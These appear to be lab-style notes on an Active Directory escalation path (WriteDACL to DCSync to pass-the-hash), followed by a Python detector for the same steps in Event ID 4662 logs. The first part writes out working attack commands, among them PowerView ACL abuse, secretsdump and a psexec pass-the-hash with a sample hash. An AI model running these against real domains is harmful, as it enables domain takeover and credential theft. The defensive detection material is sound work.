path example - join group and WriteDACL

owned user -> administrator, by joining a group that is allowed to modify the domain object's DACL (Discretionary Access Control List): the WriteDacl right is used to grant DCSync, and the dumped administrator hash is then reused for a shell

  1. create a domain user
     net user user pass /add /domain
  2. add the user to the group that is allowed to perform WriteDacl on the domain object
     net group group user /add /domain
  3. store the new user's password as a SecureString
     $pass = ConvertTo-SecureString pass -AsPlainText -Force
  4. create a PSCredential object for that user (the constructor takes the username as a string, then the SecureString)
     $cred = New-Object System.Management.Automation.PSCredential("domain\user", $pass)
  5. grant the created user DCSync rights on the domain object with PowerView's Add-DomainObjectAcl
     Add-DomainObjectAcl -Credential $cred -TargetIdentity DC=domain,DC=local -PrincipalIdentity user -Rights DCSync
  6. on the attacker machine, dump the domain hashes with secretsdump.py, authenticating as the user that now holds DCSync rights ($IP is the domain controller)
     secretsdump.py htb.local/hans:hans123@$IP
  7. use psexec.py with the dumped administrator NT hash (pass-the-hash) to get a shell as administrator
     psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip IP administrator@IP
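From the defender's side, steps 5 and 6 of this path each leave a footprint in Windows Security Event ID 4662 (an operation was performed on a directory object): the DACL change on the domain head is a request carrying the WRITE_DAC access bit, and the replication itself is a control-access request listing the DS-Replication-Get-Changes rights. The following detection is an added example and not part of the original notes; the event records are constructed inline to mirror the relevant 4662 fields (field rendering of ObjectName and AccessMask is a simplifying assumption, as is the `ALLOWED_REPLICATORS` service-account allowlist), and the domain DN is the one used on this page.

```python
"""Flag the WriteDACL-on-domain and DCSync stages of the path in 4662 events.

Added example. SAMPLE_EVENTS are constructed records, not real log data.
"""
import re
from typing import Dict, Iterable, List

# Control-access-right GUIDs whose holders can pull directory replication
# data ("DCSync"). These are the well-known Active Directory values.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
WRITE_DAC = 0x00040000  # standard access-mask bit: modify the object's DACL

# Domain naming context from the notes above; the domain head is the object
# whose DACL the path modifies.
DOMAIN_HEAD_DN = "DC=domain,DC=local"

# Assumed allowlist of non-machine accounts that legitimately replicate
# (e.g. a directory-sync service account). Placeholder name, tune per site.
ALLOWED_REPLICATORS = frozenset({"svc_adsync"})

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def is_machine_account(name: str) -> bool:
    """Computer accounts (including domain controllers) end in '$'."""
    return name.endswith("$")


def replication_rights(properties: str) -> List[str]:
    """Return the human names of any replication GUIDs in a Properties field."""
    return [
        REPLICATION_RIGHTS[g.lower()]
        for g in GUID_RE.findall(properties)
        if g.lower() in REPLICATION_RIGHTS
    ]


def analyze(events: Iterable[Dict]) -> List[Dict]:
    """Run both rules over 4662 events and return findings in log order."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        user = ev.get("SubjectUserName", "")
        mask = int(ev.get("AccessMask", "0x0"), 16)

        # Rule 1: WRITE_DAC requested on the domain head itself. Expected
        # only from tightly held admin accounts; any hit warrants review.
        if mask & WRITE_DAC and ev.get("ObjectName") == DOMAIN_HEAD_DN:
            findings.append({"rule": "WriteDACL on domain head",
                             "user": user, "object": ev.get("ObjectName")})

        # Rule 2: replication rights exercised by something that is not a
        # domain controller machine account or an allowlisted sync account.
        rights = replication_rights(ev.get("Properties", ""))
        if rights and not is_machine_account(user) \
                and user not in ALLOWED_REPLICATORS:
            findings.append({"rule": "DCSync", "user": user,
                             "object": ev.get("ObjectName"), "rights": rights})
    return findings


# Constructed sample: a normal DC replication, the two malicious steps, an
# unrelated object access with a made-up GUID, and a non-4662 event.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "ObjectName": DOMAIN_HEAD_DN,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "user", "AccessMask": "0x40000",
     "ObjectName": DOMAIN_HEAD_DN, "Properties": ""},
    {"EventID": 4662, "SubjectUserName": "user", "AccessMask": "0x100",
     "ObjectName": DOMAIN_HEAD_DN,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "alice", "AccessMask": "0x100",
     "ObjectName": "CN=alice,CN=Users," + DOMAIN_HEAD_DN,
     "Properties": "{11111111-2222-3333-4444-555555555555}"},
    {"EventID": 4624, "SubjectUserName": "alice"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

Auditing of "Directory Service Access" must be enabled and a SACL set on the domain object for 4662 to be logged at all; the same DACL change is also visible as Event ID 5136 on the nTSecurityDescriptor attribute. The machine-account heuristic is deliberately simple: a compromised domain controller account would pass it, so it complements rather than replaces a review of who actually holds replication rights on the domain head.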